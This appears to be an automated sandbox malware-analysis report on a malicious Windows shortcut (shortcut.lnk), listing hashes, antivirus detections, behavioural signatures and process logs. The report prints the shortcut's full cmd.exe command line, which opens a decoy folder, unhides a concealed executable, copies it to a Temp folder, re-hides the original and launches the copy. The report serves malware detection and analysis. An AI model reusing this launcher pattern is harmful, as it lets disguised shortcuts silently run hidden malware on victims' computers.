Windows Analysis Report
shortcut.lnk

Overview

General Information

Sample Name: shortcut.lnk
Analysis ID: 795673
MD5: 00441beff42872f67c32a011c97caea2
SHA1: 595841cda4eb3b01bbaf3fe57569bc656b778067
SHA256: 0b1d60ba6baa76c075a7410c260a2b174c7e999e813b6a4d582c18592222601b
Tags: lnk

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Windows shortcut file (LNK) starts blacklisted processes
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Sample execution stops while process was sleeping (likely an evasion)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Creates a process in suspended mode (likely to inject code)
Searches for user specific document files

Classification

AV Detection

Source: shortcut.lnk Avira: detected
Source: shortcut.lnk ReversingLabs: Detection: 69%
Source: shortcut.lnk Virustotal: Detection: 72%
Source: shortcut.lnk Joe Sandbox ML: detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine Classification label: mal72.winLNK@11/0@0/0
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\windows\system32\cmd.exe" /c "C:\Windows\explorer.exe %cd%.DataStorage & attrib -s -h %cd%dBuXlYk.exe & xcopy /F /S /Q /H /R /Y %cd%dBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ & attrib +s +h %cd%dBuXlYk.exe & start C:\Users\user\AppData\Local\Temp\zHyIh\dBuXlYk.exe & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe File read: C:\Users\desktop.ini
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\MsftEdit.dll
Source: Window Recorder Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 351
Source: explorer.exe, 00000003.00000002.569217783.00000000061BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents
No contacted IP infos